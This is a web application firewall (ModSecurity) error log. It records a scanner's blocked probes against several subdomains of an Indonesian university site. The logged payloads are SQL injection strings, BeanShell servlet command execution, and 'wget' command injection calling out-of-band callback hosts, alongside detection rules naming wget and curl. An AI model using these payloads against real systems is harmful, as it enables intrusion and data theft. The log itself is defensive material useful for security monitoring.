[Tue Aug 29 11:30:47.388840 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPPSxUAAAAd"]
[Tue Aug 29 11:30:47.389498 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAN@4-0AAAAO"]
[Tue Aug 29 11:30:47.428188 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPiBi0AAAAB"]
[Tue Aug 29 11:30:47.432188 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPpWecAAAAI"]
[Tue Aug 29 11:30:47.438511 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPMmDQAAAAY"]
[Tue Aug 29 11:30:47.440221 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPmhNoAAAAV"]
[Tue Aug 29 11:30:47.443707 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAP05F8AAAAA"]
[Tue Aug 29 11:30:47.513104 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPMmDUAAAAY"]
[Tue Aug 29 11:30:47.537834 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPMmDYAAAAY"]
[Tue Aug 29 11:30:47.543074 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO10d8Co-f0AAAPxBUMAAAAS"]
[Tue Aug 29 11:30:47.567807 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAOM4Y0AAAAU"]
[Tue Aug 29 11:30:47.606858 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPPSxgAAAAd"]
[Tue Aug 29 11:30:48.300350 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg57n4hayqeh3x7.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPMmDcAAAAY"]
[Tue Aug 29 11:30:48.310772 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgxfaxz5uf3rw9q.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPxBUUAAAAS"]
[Tue Aug 29 11:30:48.312048 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPRNc4AAAAf"]
[Tue Aug 29 11:30:48.313165 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPiBjAAAAAB"]
[Tue Aug 29 11:30:48.316497 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPmhN0AAAAV"]
[Tue Aug 29 11:30:48.340758 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgkpbbsbyuhmb6k.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPRNc8AAAAf"]
[Tue Aug 29 11:30:48.341527 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgyinjetbzyjss8.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPpWesAAAAI"]
[Tue Aug 29 11:30:48.342937 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAP05GMAAAAA"]
[Tue Aug 29 11:30:48.344572 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10eMCo-f0AAAOOuZgAAAAW"]
[Tue Aug 29 11:30:48.365182 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg4q87xxakm3dfg.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPiBjEAAAAB"]
[Tue Aug 29 11:30:48.367620 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10eMCo-f0AAAPxBUcAAAAS"]
[Tue Aug 29 11:30:48.368991 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAO878gAAAAF"]
[Tue Aug 29 11:30:48.384623 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAPOha8AAAAa"]
[Tue Aug 29 11:30:48.386731 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAOM4ZEAAAAU"]
[Tue Aug 29 11:30:48.389369 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAOKNq0AAAAK"]
[Tue Aug 29 11:30:48.392115 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 